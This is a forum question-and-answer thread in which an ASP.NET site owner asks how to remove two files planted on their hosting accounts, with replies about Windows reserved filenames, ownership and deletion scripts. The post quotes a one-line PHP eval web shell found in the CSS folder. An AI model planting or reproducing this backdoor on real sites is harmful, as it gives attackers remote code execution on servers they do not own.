0

About 10 days ago I saw 2 unknown files on my websites (ASP.NET websites).

they spread on all 3 of my websites, and placed them selves in the CSS folder.

The first one was with the name of 'Paths.php' with this code in it.

500 <?php @eval($_POST['360']);?>

When I Googled the code, I found out it's kinda of a backdoor that kinda able to send anything it wants through a URL targeting the malicious file. So I deleted it immediately.

But the second file which has the name of 'nul.doc.asp' , That I wasn't able to see it's code or even delete it, it's named in a way that I can't rename, edit, move, delete, the server says it can't reach it.

I am really desperate to get rid of it with no luck at all, I even contacted the Customer Support and they didn't do thing in 10 days.

So can you help me guys by getting rid of it?

P.S I even tried to delete an entire website, everything was deleted but the file.

Remy Jouni
  • 1
  • 1
  • 1
    `NUL` (in either case) is one of the reserved filenames not accessible normally on Windows. See http://superuser.com/questions/86999/unable-to-rename-a-folder-or-a-file-as-con where several answers tell you to use the special doublebackslash-dot or doublebackslash-question namespaces, which I can't get to format correctly in a comment. However, if you haven't fixed the vulnerability(ies) that allowed your sites to be hacked, they'll probably be hacked again very quickly. – dave_thompson_085 Oct 20 '16 at 06:24
  • Can you please write me down the command? I use FileZilla and when I used the command 'DELE \\.nul.doc.asp ' it says file not found or invalid. – Remy Jouni Oct 20 '16 at 13:42
  • As the linked answers say, you need to use the full pathname something like \\.\c:\dir\dir\dir\filename – dave_thompson_085 Oct 21 '16 at 07:59
  • I might not explained well that I just have an account on an ASP.NET hosting company, so I don't have access to it's Windows Server, the farthest root I can get is like this '/petrasurprise.com/wwwroot/images/nul.doc.asp' and when I try 'DELE \\./petrasurprise.com/wwwroot/images/nul.doc.asp' or 'DELE \\?/petrasurprise.com/wwwroot/images/nul.doc.asp' It says invalid file name. it's just that I can't get to C: directory. I don't have access on the server. – Remy Jouni Oct 22 '16 at 12:46
  • Don't use the domainname; these special formats operate locally only, in this case local to the FTP server. You should be able to use C: _as part of a correct path_ even if you don't have access to the files in it. However, you do need the correct local path; the IIS webroot (and presumably also the root of the FTP server you are using, since it apparently matches) may well have been moved to a different disk for better performance. – dave_thompson_085 Oct 23 '16 at 05:01

2 Answers2

0

What about uploading yourself some shell code which would delete the file?

Something like deleteThaFile.asp:

<%
     Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
     Call oFileSys.DeleteFile("nul.doc.asp", True)
%>

Would that help?

You could also use the FileSystemObject to get some more information on the file (and other files) to better understand why it cant be deleted.

May be you could also deploy there some more generic ASP shell like file-manager, to see more what can be done about the file.

Michal Ambroz
  • 311
  • 1
  • 5
0

I'm going to assume that you are on a Windows 2008/2012 server with full UI.

You should be able to rightclick -> Properties -> Security Tab -> Advanced Button -> Owner Tab.

From within this tab, you should be able to assign ownership back to your user. From there, you should be able to remove it.

If you don't have a UI and are running server core etc, you can run: TAKEOWN /F nul.doc.asp

Before you delete it, once you have ownership, i'd probably want to take a look in it, just to see what's going on. Then remove it, or at the very least, rename it.

Hope that helps.

mumbles
  • 380
  • 1
  • 2
  • 12